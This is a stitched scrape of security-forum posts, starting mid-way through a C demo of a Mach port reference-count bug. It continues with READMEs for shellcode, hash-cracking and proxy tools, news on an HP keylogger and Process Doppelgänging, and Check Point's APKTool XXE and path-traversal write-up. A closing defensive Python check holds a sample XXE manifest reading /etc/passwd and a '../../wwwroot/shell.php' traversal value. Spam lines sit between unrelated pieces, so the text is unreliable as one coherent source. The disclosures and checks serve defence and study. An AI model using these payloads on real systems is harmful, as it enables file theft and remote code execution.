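        return KERN_FAILURE;       /* ... but claims to have consumed none */
    }
    c->notify_port = wake_port;    /* success: ownership moves to the client */
    return KERN_SUCCESS;
}

/* Ownership-correct shape: an error path touches no reference at all;
 * the MIG caller is the one that drops it. */
int set_notify_fixed(client_t *c, port_t *wake_port) {
    if (c->notify_port != NULL) return KERN_FAILURE;
    c->notify_port = wake_port;
    return KERN_SUCCESS;
}

/* What the MIG-generated code does around the external method: the incoming
 * message carries one reference; on error that reference is MIG's to drop. */
int mig_dispatch(client_t *c, port_t *wake_port, notify_method_t method) {
    port_retain(wake_port);
    int kr = method(c, wake_port);
    if (kr != KERN_SUCCESS) port_release(wake_port);
    return kr;
}

/* Register twice (second call errors). Correct accounting leaves the user's
 * own reference plus the client's: 2. */
int refs_after_two_calls(notify_method_t method) {
    port_t port = { 1, 0 };          /* 1 = the user's own reference */
    client_t client = { NULL };
    mig_dispatch(&client, &port, method);
    mig_dispatch(&client, &port, method);
    return port.refs;
}

/* Same sequence, then the user drops its reference and the client is torn
 * down. Returns 1 if a release ran against an already-dead port. */
int over_release_during_teardown(notify_method_t method) {
    port_t port = { 1, 0 };
    client_t client = { NULL };
    mig_dispatch(&client, &port, method);
    mig_dispatch(&client, &port, method);
    port_release(&port);                                        /* user */
    if (client.notify_port) port_release(client.notify_port);   /* teardown */
    client.notify_port = NULL;
    return port.over_released;
}

int main(void) {
    printf("fixed: refs=%d over-release=%d\n",
           refs_after_two_calls(set_notify_fixed),
           over_release_during_teardown(set_notify_fixed));
    printf("buggy: refs=%d over-release=%d\n",
           refs_after_two_calls(set_notify_buggy),
           over_release_during_teardown(set_notify_buggy));
    return 0;
}
```

The count is already one short right after the second call; the over-release only surfaces later, at teardown, which is why these bugs read as double frees far from the method that caused them. The review question for any MIG-facing method is therefore purely mechanical: does every error return leave all argument references untouched?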
-
ShellcodeToAssembly

Replace in shellcodetoasm.py with your shellcode. { Endian type is little endian. }

shellcode = ''

Installation

git clone https://github.com/blacknbunny/ShellcodeToAssembly.git && cd ShellcodeToAssembly/ && pip2 install -r requirements.txt && python2 shellcodetoasm.py

Modules manual installation

pip install -r requirements.txt

it can be

pip2 install -r requirements.txt

Usage

python2 shellcodetoasm.py [returnbit] [architecture] [assembly-flavor]

For example

python2 shellcodetoasm.py 32 x86 att
python2 shellcodetoasm.py 64 x86

Second one is auto intel

Architectures: ARM, ARM64, MIPS, ppc, X86
Return Bit: 32, 64
Assembly Flavor: ATT, INTEL

Demo: https://asciinema.org/a/xjWrXfftZS7BvSzVRd44LuzkP

Download: ShellcodeToAssembly-master.zip or git clone https://github.com/blacknbunny/ShellcodeToAssembly.git

Source: https://github.com/blacknbunny/ShellcodeToAssembly
-
try at http://www.darkdog-energydrink.com/ energy drinks, supplements, etc. What amounts are we talking about?
-
the calm before the storm!
-
//deleted
-
About SeKey is an SSH agent that allows users to authenticate to UNIX/Linux SSH servers using the Secure Enclave. How does it work? The Secure Enclave is a hardware-based key manager that’s isolated from the main processor to provide an extra layer of security. When you store a private key in the Secure Enclave, you never actually handle the key, making it difficult for the key to become compromised. Instead, you instruct the Secure Enclave to create the key, securely store it, and perform operations with it. You receive only the output of these operations, such as encrypted data or a cryptographic signature verification outcome. Limitations Only supports MacBook Pro with the Touch Bar and Touch ID Can’t import a preexisting key Stores only 256-bit elliptic curve private keys Install & Usage Download: sekey-master.zip Source: https://github.com/ntrippar/sekey
-
Pancake is a CLI/Emacs web/gopher/file browser. It utilizes pandoc and external downloaders such as curl, adding support for Gopher directories and plain text files, and invoking external applications (e.g., image and PDF viewers) depending on its configuration. User interaction capabilities are rather basic, as it is intended to be combined with software that provides better user interfaces – such as emacs, rlwrap, tmux, screen. cgit: https://git.uberspace.net/pancake/ github: https://github.com/defanor/pancake.git source distribution: pancake-0.1.7.tar.gz binaries (Linux, amd64): pancake-0.1.7-bin.tgz Debian binary package (amd64): pancake-0.1.7.deb See README for more information. 1. Other text-based web/gopher browsers Wikipedia lists a few major text-based web browsers, including Emacs-based ones. Pancake provides a combination of the things I liked about those, and the ones I have missed in those: Multi-protocol support (via curl or other pluggable downloaders). Multi-format support (via pandoc). Plain CLI. An Emacs interface without unnecessary blocking, and general support for embedding. Simplicity and small codebase, thanks to reusing the programs mentioned above. Efficient UI. Use of external programs to handle file types which it doesn't support. There are some drawbacks as well: A large executable file (70+ Mio uncompressed). Not as hackable in Elisp as pure (or mostly) Elisp browsers. Not as portable as C or Elisp ones. A relatively small set of features. Somewhat worse HTML parsing and rendering in some cases. Quite possibly more, depending on one's preferences. 2. Installation 2.1 Pancake cabal install would build and install pancake and its documentation. Alternatively, basic Debian packages and binary releases are available. 2.2 Emacs interface M-x package-install-file RET /path/to/pancake.el RET. 
To set it as your default emacs browser: (require 'pancake) (setq browse-url-browser-function 'pancake-browse-url) To load and show all images automatically (not just after saving them manually): (add-hook 'pancake-display-hook 'pancake-load-images) Though it might be desirable to write a wrapper to only show those on specific websites, e.g. webcomics, and perhaps specific images only. 3. Screenshots https://defanor.uberspace.net/projects/pancake/
-
debugProxy is an HTTP/S proxy server that can be used by any device that supports using HTTP proxy servers. Additionally it is a web application that allows you to view, pause and modify traffic sent through the proxy. This means, for example, you can use debugProxy on your computer or tablet to view the traffic being sent from your phone or IoT device. For information on configuring devices or applications to use debugProxy have a look at our documentation pages. cURL If you have the curl program installed on your computer, you can test if the proxy works with this command: curl https://www.google.com/ --insecure --proxy fagiq:rhrnx@debugproxy.com:8080 If this command works as expected the requests and responses will be on the dashboard. SSL Traffic The proxy just works for HTTP requests, however to make HTTPS and HTTP2 requests a root certificate needs to be downloaded and installed. The debugProxy root certificates can be found on the certificates page. On most smart phones you can install the debugProxy root certificate by simply clicking on the certificate for your device. Try it now! Source: https://debugproxy.com/
-
HP has an awful history of 'accidentally' leaving keyloggers on its customers' laptops. At least two times this year, HP laptops were caught with pre-installed keylogger or spyware applications. I was following a tweet made by a security researcher claiming to have found a built-in keylogger in several HP laptops, and now he went public with his findings. A security researcher who goes by the name of ZwClose discovered a keylogger in several Hewlett-Packard (HP) laptops that could allow hackers to record your every keystroke and steal sensitive data, including passwords, account information, and credit card details. The keylogger was found embedded in the SynTP.sys file, a part of the Synaptics touchpad driver that ships with HP notebook computers, leaving more than 460 HP Notebook models vulnerable to hackers. Although the keylogger component is disabled by default, hackers can make use of available open source tools for bypassing User Account Control (UAC) to enable the built-in keylogger "by setting a registry value." Here’s the location of the registry key: HKLM\Software\Synaptics\%ProductName% HKLM\Software\Synaptics\%ProductName%\Default The researcher reported the keylogger component to HP last month, and the company acknowledged the presence of the keylogger, saying it was actually "a debug trace" which was left accidentally, but has now been removed. The company has released a driver update for all the affected HP Notebook models. If you own an HP laptop, you can look for updates for your model. The list of affected HP notebooks can be found at the HP Support website. This is not the very first time a keylogger has been detected in HP laptops. In May this year, a built-in keylogger was found in an HP audio driver that was silently recording all of its users' keystrokes and storing them in a human-readable file. Get the list of affected hardware and patch here: https://support.hp.com/us-en/document/c05827409 Via thehackernews.com
-
-
99.9% Uptime Guarantee, Unlimited Bandwidth, 1 Gbps Port, Pre-Installed Software Available. Sold.
-
A team of security researchers has discovered a new malware evasion technique that could help malware authors defeat most of the modern antivirus solutions and forensic tools. Dubbed Process Doppelgänging, the new fileless code injection technique takes advantage of a built-in Windows function and an undocumented implementation of the Windows process loader. enSilo security researchers Tal Liberman and Eugene Kogan, who discovered the Process Doppelgänging attack, presented their findings today at the Black Hat 2017 security conference held in London. Process Doppelgänging Works on All Windows Versions Apparently, the Process Doppelgänging attack works on all modern versions of the Microsoft Windows operating system, from Windows Vista to the latest version of Windows 10. Tal Liberman, the head of the research team at enSilo, told The Hacker News that this malware evasion technique is similar to Process Hollowing—a method first introduced years ago by attackers to defeat the mitigation capabilities of security products. In a Process Hollowing attack, hackers replace the memory of a legitimate process with malicious code so that the second code runs instead of the original, tricking process monitoring tools and antivirus into believing that the original process is running. Since all modern antivirus and security products have been upgraded to detect Process Hollowing attacks, use of this technique is not a great idea anymore. On the other hand, Process Doppelgänging is an entirely different approach to achieve the same, by abusing Windows NTFS Transactions and an outdated implementation of the Windows process loader, which was originally designed for Windows XP, but carried throughout all later versions of Windows. Here's How the Process Doppelgänging Attack Works: Before going further on how this new code injection attack works, you need to understand what a Windows NTFS Transaction is and how an attacker could leverage it to hide his malicious actions.
NTFS Transaction is a feature of Windows that brings the concept of atomic transactions to the NTFS file system, allowing files and directories to be created, modified, renamed, and deleted atomically. An NTFS Transaction is an isolated space that allows Windows application developers to write file-output routines that are guaranteed to either succeed completely or fail completely. According to the researchers, Process Doppelgänging is a fileless attack and works in four major steps as mentioned below: Transact—process a legitimate executable into the NTFS transaction and then overwrite it with a malicious file. Load—create a memory section from the modified (malicious) file. Rollback—roll back the transaction (deliberately failing the transaction), resulting in the removal of all the changes in the legitimate executable as if they never existed. Animate—bring the doppelganger to life. Use the older implementation of the Windows process loader to create a process with the previously created memory section (in step 2), which is actually malicious and never saved to disk, "making it invisible to most recording tools such as modern EDRs." Process Doppelgänging Evades Detection from Most Antiviruses Liberman told The Hacker News that during their research they tested their attack on security products from Windows Defender, Kaspersky Labs, ESET NOD32, Symantec, Trend Micro, Avast, McAfee, AVG, Panda, and even advanced forensic tools. In order to demonstrate, the researchers used Mimikatz, a post-exploitation tool that helps extract credentials from the affected systems, with Process Doppelgänging to bypass antivirus detection. When the researchers ran Mimikatz normally on a Windows operating system, the Symantec antivirus solution caught the tool immediately, as shown below: However, Mimikatz ran stealthily, without antivirus displaying any warning, when executed using Process Doppelgänging, as shown in the image at the top of this article.
Liberman also told us that Process Doppelgänging works on even the latest version of Windows 10, except Windows 10 Redstone and Fall Creators Update, released earlier this year. But due to a different bug in Windows 10 Redstone and Fall Creators Update, using Process Doppelgänging causes a BSOD (blue screen of death), which crashes users' computers. Ironically, the crash bug was patched by Microsoft in later updates, allowing Process Doppelgänging to run on the latest versions of Windows 10. I don't expect Microsoft to rush out an emergency patch that could make some software relying on older implementations unstable, but antivirus companies can upgrade their products to detect malicious programs using Process Doppelgänging or similar attacks. This is not the very first time enSilo researchers have discovered a malware evasion technique. Previously they discovered and demonstrated the AtomBombing technique, which also abused a design weakness in the Windows OS. In September, enSilo researchers also disclosed a 17-year-old programming error in the Microsoft Windows kernel that prevented security software from detecting malware at runtime when loaded into system memory. Via thehackernews.com
-
-
It's already been posted, you're spamming like crazy.
-
Dagon - Advanced Hash Manipulation Named after the prince of Hell, Dagon (day-gone) is an advanced hash cracking and manipulation system, capable of bruteforcing multiple hash types, creating bruteforce dictionaries, automatic hashing algorithm verification, random salt generation from Unicode to ASCII, and much more. Note: Dagon comes complete with a Hash Guarantee: I personally guarantee that Dagon will be able to crack your hash successfully. At any point Dagon fails to do so, you will be given a choice to automatically create a Github issue with your hash. Once this issue is created, I will try my best to crack your hash for you. The Github issue is completely anonymous, and no questions will be asked. This is my way of thanking you for using Dagon. There are alternatives to using the automatic issue creator. If you do not want your hash publicly displayed, and feel Dagon has failed you, feel free to create your own issue. Or send an email with the hash information to dagonhashguarantee@gmail.com Screenshots Bruteforcing made easy with a built in wordlist creator if you do not specify one. The wordlist will create 100,000 strings to use Verify what algorithm was used to create that hash you're trying to crack. You can specify to view all possible algorithms by providing the -L flag (some algorithms are not implemented yet) Random salting, unicode random salting, or you can make your own choice on the salt. 
Demo video Download Preferably you can clone the repository with git clone https://github.com/ekultek/dagon.git; alternatively you can download the zip or tarball here. Basic usage For full functionality of Dagon please reference the homepage here or the user manual. python dagon.py -h This will run the help menu and provide a list of all possible flags python dagon.py -c <HASH> --bruteforce This will attempt to bruteforce a given hash python dagon.py -l <FILE-PATH> --bruteforce This will attempt to bruteforce a given file full of hashes (one per line) python dagon.py -v <HASH> This will try to verify the algorithm used to create the hash python dagon.py -V <FILE-PATH> This will attempt to verify each hash in a file, one per line Installation Dagon requires python version 2.7.x to run successfully. git clone https://github.com/ekultek/dagon.git cd Dagon pip install -r requirements.txt This should install all the dependencies that you will need to run Dagon. Contributions All contributions are greatly appreciated and helpful. When you contribute you will get your name placed on the homepage underneath contributions with a link to your contribution. You will also get massive respect from me, and that's a pretty cool thing. What I'm looking for in contributions is some of the following: Hashing algorithm creations, specifically: a quicker MD2 algorithm, full Tiger algorithms, Keychain algorithms for cloud and agile; More wordlists to download from, please make sure that the link is encoded; Rainbow table attack implementation; More regular expressions to verify different hash types. Source: https://github.com/Ekultek/dagon
-
Researchers: Eran Vaknin, Gal Elbaz, Alon Boxiner, Oded Vanunu Latest research from the Check Point Research Team has revealed several vulnerabilities that put each and every organization that does any type of Java/Android development at great risk of a threat actor exploiting these vulnerabilities and penetrating them. The vulnerabilities in question are in the developer tools, both downloadable and cloud based, that the Android application ecosystem, the largest application community in the world, is using. This includes the tools that all Java/Android programmers use to build their companies' business applications and that security analysts and reverse engineers use to do their work. As seen in WikiLeaks' ‘Vault 7’ release earlier this year, the CIA and NSA are exploiting vulnerabilities in products of companies of all sizes, all over the world. Earlier this year we saw incidents of the CIA hacking CCleaner, Notepad++ and many more, with the aim of spreading malware into organizations and acquiring information on their users, and the companies themselves. Through our own research we have found several vulnerabilities that affect the most common Android IDEs – Google's Android Studio and JetBrains' IntelliJ IDEA and Eclipse, as well as the major reverse engineering tools for Android applications such as APKTool, the Cuckoo-Droid service and more. Our research below illustrates how we exploited these tools to gain access to internal files. Following this research, Check Point reported the discovery to the APKTool developers and the other IDE companies back in May 2017. In turn, Google and JetBrains have verified and acknowledged the security issues and have since effectively deployed a fix. Technical Details – From XXE to RCE: Attacking The Second Layer The first stage of our research was focused on APKTool (Android Application Package Tool).
As the most popular tool for reverse engineering third party Android apps, APKTool is used for supporting custom platforms, analyzing applications and much more, including the decoding and rebuilding of resources. The two main features of APKTool are: 1. Decompiling an APK file. 2. Building an APK file. From our research we found that APKTool is vulnerable in both of these main features. By looking at the source code of APKTool, we managed to identify an XML External Entity (XXE) vulnerability, due to the fact that the configured XML parser of APKTool does not disable external entity references when parsing an XML file within the program. The vulnerable function is called loadDocument and it is used in both core functionalities – ‘Build’ and ‘Decompile’ – of APKTool. The vulnerability exposes the whole OS file system of APKTool users, and as a result, attackers could potentially retrieve any file on the victim's PC by using a malicious “AndroidManifest.xml” file that exploits the XXE vulnerability; the file contents could then be sent to a remote attacker server. And this attack scenario is just one of many possible XXE attack techniques that could lead to harmful outcomes. Realizing the enormity of this vulnerability to the Android developer and researcher community, we extended our research to the vulnerable XML parser, “DocumentBuilderFactory”, which is used in the APKTool project. Vulnerabilities in Developer Tools This led us to find multiple vulnerable implementations of the XML parser within other projects. Moreover, we identified that the most popular IDEs that are used for building Android applications are affected – including IntelliJ, Eclipse, and Android Studio. By simply loading the malicious “AndroidManifest.xml” file as part of any Android project, the IDEs start spitting out any file configured by the attacker.
To demonstrate this vulnerability, we have uploaded a malicious project library to GitHub and cloned it to an Android Studio project. Example of a Malicious Github Project With The XXE Payload: Cloned to Android Studio: Result: The attack was delivered successfully, and the protected file was stolen and sent to the presented attacker's server without the user being aware of it – See image below: Furthermore, we have found another attack scenario that can be used in the wild to attack a massive range of Android developers by injecting a malicious AAR (Android Archive Library) containing our XXE payload into repositories. It is possible, for example, to upload an infected AAR to a public repository such as the central Maven repository, though for demonstration purposes we have uploaded an infected AAR to a local repository. Cloning the infected AAR from the repository by the victim would allow the attacker to steal sensitive files such as configuration files, source code, company digital proprietary and much more from the OS file system. Uploading a Malicious AAR to Local Repository: Adding the AAR to Android Studio Project: Result: The attack was delivered successfully, and the protected file was stolen and sent to the presented attacker's server without the user being aware of it: Further research of APKTool then led us to find an additional vulnerability that allows us to execute OS commands on a victim's PC. For advanced use of APKTool there is a configuration file named “APKTOOL.YML”. This file contains an interesting section called “unknownFiles”, which allows users to include a non-standard file location that will be placed correctly in the rebuild process of an APK. The selected files are saved on the filesystem in the ‘Unknown’ folder.
A legitimate “APKTOOL.YML” file structure looks like this: By manipulating the path in the “unknownFiles” section inside the “APKTOOL.YML” file, it is possible to inject arbitrary files anywhere on the file system (Path Traversal). This is due to the fact that APKTool does not validate the path to which the unknown files will be extracted from the packed APK. Indeed, injecting arbitrary files anywhere in the filesystem leads to full Remote Code Execution (RCE) – meaning that any APKTool user/service that tries to decode a crafted malicious APK is vulnerable to RCE. For demonstration purposes, we have created a web application similar to the official online APK decoder ( https://apk.tools ). APKTool will extract the malicious file (in this case we used a PHP web shell) to the wwwroot folder of that server: After building the APK with the modified configuration file, the result is a compressed APK with our malicious file inside the malformed path. Uploading the APK to the demo site allows the attacker to execute OS commands on the web application server. This attack could thus be launched against any online/offline service that decodes APKs behind the scenes using APKTool. The way we chose to demonstrate this vulnerability is of course just one of many possible attack methods that can be used to achieve full RCE. Indeed, the Path Traversal method lets us copy any file to any location on the file system, making the attack surface wide and varied. All the attack methods demonstrated above are cross-platform and generic and, as APKTool is designed to work on top of several operating systems, it is also possible to attack any system on which it operates without restriction or limitation. It is impossible to estimate the number of users of this well-known open source project. Yet, knowing that among them are some large services and companies (e.g.
https://apk.tools, http://www.javadecompilers.com/APKTool, https://www.apkdecompilers.com/, http://undroid.av-comparatives.info, Cuckoo droid and many more), we contacted APKTool developer and IDE companies and are pleased to report that they all fixed the security issues and released updated and improved versions of their products. Source: https://research.checkpoint.com/parsedroid-targeting-android-development-research-community/
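The two APKTool defects above (the XXE-capable manifest parser and the unvalidated `unknownFiles` paths), as an added example that is not Check Point's or APKTool's code: two input checks a tool that unpacks untrusted APKs could apply before parsing a manifest or writing an unknown file. Function names, the sample `unknownFiles` entries and both manifests are constructed for this example.

```python
"""Two input checks for a tool that unpacks untrusted APKs, modelled on the
APKTool issues in the write-up (added example, not Check Point's or
APKTool's code; function names are mine): unknownFiles paths must stay inside
the Unknown/ output folder, and a manifest declaring external entities is
refused before any parser can fetch them."""
from pathlib import PurePosixPath
import xml.parsers.expat

# Constructed sample inputs (not taken from the article).
SAMPLE_UNKNOWN_FILES = [
    "hidden/config.bin",          # legitimate: lands in Unknown/hidden/
    "../../wwwroot/shell.php",    # traversal out of the output folder
    "/etc/cron.d/job",            # absolute path
]
BENIGN_MANIFEST = b"""<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.app"/>
"""
MALICIOUS_MANIFEST = b"""<?xml version="1.0"?>
<!DOCTYPE manifest [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<manifest package="com.example.app">&xxe;</manifest>
"""


def check_unknown_files(entries, unknown_dir="Unknown"):
    """Split `entries` into (accepted_targets, rejected_entries).

    Purely lexical, so nothing is touched on disk: absolute paths, '..'
    components, empty names and backslashes are rejected up front; after
    that base.joinpath() cannot escape the output folder.
    """
    base = PurePosixPath(unknown_dir)
    accepted, rejected = [], []
    for entry in entries:
        path = PurePosixPath(entry)
        if (not path.parts or path.is_absolute()
                or ".." in path.parts or "\\" in entry):
            rejected.append(entry)
            continue
        target = base.joinpath(path)
        assert base in target.parents   # the containment property itself
        accepted.append(str(target))
    return accepted, rejected


class ExternalEntityDeclared(ValueError):
    """The DTD declares a SYSTEM/PUBLIC entity, i.e. an XXE vector."""


def parse_manifest(xml_bytes):
    """Parse with expat and return the manifest's package attribute.

    Expat reports each entity declaration before resolving anything, so
    raising in EntityDeclHandler aborts the parse at the first external one.
    """
    found = {}

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            raise ExternalEntityDeclared(f"entity {name!r} -> {system_id}")

    def start_element(tag, attrs):
        if tag == "manifest":
            found["package"] = attrs.get("package")

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = entity_decl
    parser.StartElementHandler = start_element
    parser.Parse(xml_bytes, True)
    return found.get("package")


def manifest_is_safe(xml_bytes):
    """True if the manifest parses without declaring external entities."""
    try:
        parse_manifest(xml_bytes)
    except ExternalEntityDeclared:
        return False
    return True
```

The path check is lexical on purpose: it runs before any file exists, which is the point at which the write-up's traversal has to be stopped.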